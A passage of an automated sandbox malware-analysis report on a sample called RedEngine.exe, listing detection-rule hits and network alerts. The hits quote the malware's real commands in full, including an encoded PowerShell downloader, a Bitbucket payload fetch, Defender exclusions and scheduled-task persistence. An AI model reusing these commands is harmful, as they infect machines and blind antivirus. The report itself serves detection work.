QAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBtAGMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbQBpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAZwBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwB2AGkAeAAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AGUAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHgAbABpACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAB
                        Sigma detected: Suspicious Script Execution From Temp Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 968, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", ProcessId: 1316, ProcessName: powershell.exe
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe, ProcessId: 2168, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CLPPTH
                        Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7768, TargetFilename: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe
                        Sigma detected: PowerShell Download Pattern
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 968, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", ProcessId: 1316, ProcessName: powershell.exe
                        Sigma detected: PowerShell Web Download
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 968, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", ProcessId: 1316, ProcessName: powershell.exe
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"", CommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe" , ParentImage: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe, ParentProcessId: 2168, ParentProcessName: mgne4i3n.t1d2.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"", ProcessId: 4240, ProcessName: cmd.exe
                        Sigma detected: Suspicious Execution of Powershell with Base64
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAAIwA4ADEAOQA6ACAAQwBhAG4AbgBvAHQAIABzAHQAYQByAHQAIABkAHUAZQAgAHQAbwAgAG0AaQBzAHMAaQBuAGcAIABkAGUAcABlAG4AZABlAG4AYwBpAGUAcwAsACAAcABsAGUAYQBzAGUAIABpAG4AcwB0AGEAbABsACAAYQBsAGwAIAB0AGgAZQAgAGQAZQBwAGUAbgBkAGUAbgBjAGkAZQBzACAAcgBlAHEAdQBpAHIAZQBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGIAcQBzACMAPgA7ACIAOwA8ACMAZQBtAHYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AGoAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AHcAeAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AcABhAG4AYwBlAGsANgAxADEAMQAxADEAMQAxADEAMQAxADEAMQAxAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBtAGMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbQBpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAZwBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwB2AGkAeAAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AGUAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHgAbABpACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAB
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f, CommandLine: schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 968, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f, ProcessId: 7828, ProcessName: schtasks.exe
                        Sigma detected: Usage Of Web Request Commands And Cmdlets
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 968, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", ProcessId: 1316, ProcessName: powershell.exe
                        Sigma detected: Use Short Name Path in Command Line
                        Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 968, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar', 'C:\Users\user~1\AppData\Local\Temp\downloaded_archive.rar')", ProcessId: 1316, ProcessName: powershell.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAAIwA4ADEAOQA6ACAAQwBhAG4AbgBvAHQAIABzAHQAYQByAHQAIABkAHUAZQAgAHQAbwAgAG0AaQBzAHMAaQBuAGcAIABkAGUAcABlAG4AZABlAG4AYwBpAGUAcwAsACAAcABsAGUAYQBzAGUAIABpAG4AcwB0AGEAbABsACAAYQBsAGwAIAB0AGgAZQAgAGQAZQBwAGUAbgBkAGUAbgBjAGkAZQBzACAAcgBlAHEAdQBpAHIAZQBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGIAcQBzACMAPgA7ACIAOwA8ACMAZQBtAHYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AGoAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AHcAeAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AcABhAG4AYwBlAGsANgAxADEAMQAxADEAMQAxADEAMQAxADEAMQAxAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBtAGMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbQBpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAZwBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwB2AGkAeAAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AGUAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHgAbABpACMAPgA=", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAB
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7972, ProcessName: svchost.exe

                        Persistence and Installation Behavior

                        barindex
                        Sigma detected: Schedule VBS From Appdata
                        Source: Process startedAuthor: Joe Security: Data: Command: schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f, CommandLine: schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 968, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f, ProcessId: 7828, ProcessName: schtasks.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-05T01:03:11.390861+020020185811A Network Trojan was detected192.168.2.749711185.166.143.50443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-05T01:03:11.390861+020028033053Unknown Traffic192.168.2.749711185.166.143.50443TCP
                        2024-09-05T01:03:12.712325+020028033053Unknown Traffic192.168.2.749712185.166.143.50443TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: RedEngine.exeAvira: detected
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeReversingLabs: Detection: 60%
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeReversingLabs: Detection: 60%
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeReversingLabs: Detection: 41%
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeReversingLabs: Detection: 60%
                        Multi AV Scanner detection for submitted file
                        Source: RedEngine.exeReversingLabs: Detection: 68%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                        Machine Learning detection for sample
                        Source: RedEngine.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_648E6000 PyCMethod_New,CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,clock,clock,clock,clock,CryptReleaseContext,31_2_648E6000

                        Compliance

                        barindex
                        Detected unpacking (overwrites its own PE header)
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeUnpacked PE file: 13.2.mgne4i3n.t1d1.exe.400000.0.unpack
                        Source: RedEngine.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.7:49708 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49709 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49730 version: TLS 1.2
                        Source: RedEngine.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3808593718.00007FFB1E3A3000.00000002.00000001.01000000.00000014.sdmp, clppth.exe, 00000026.00000003.1855125182.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1948258796.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp
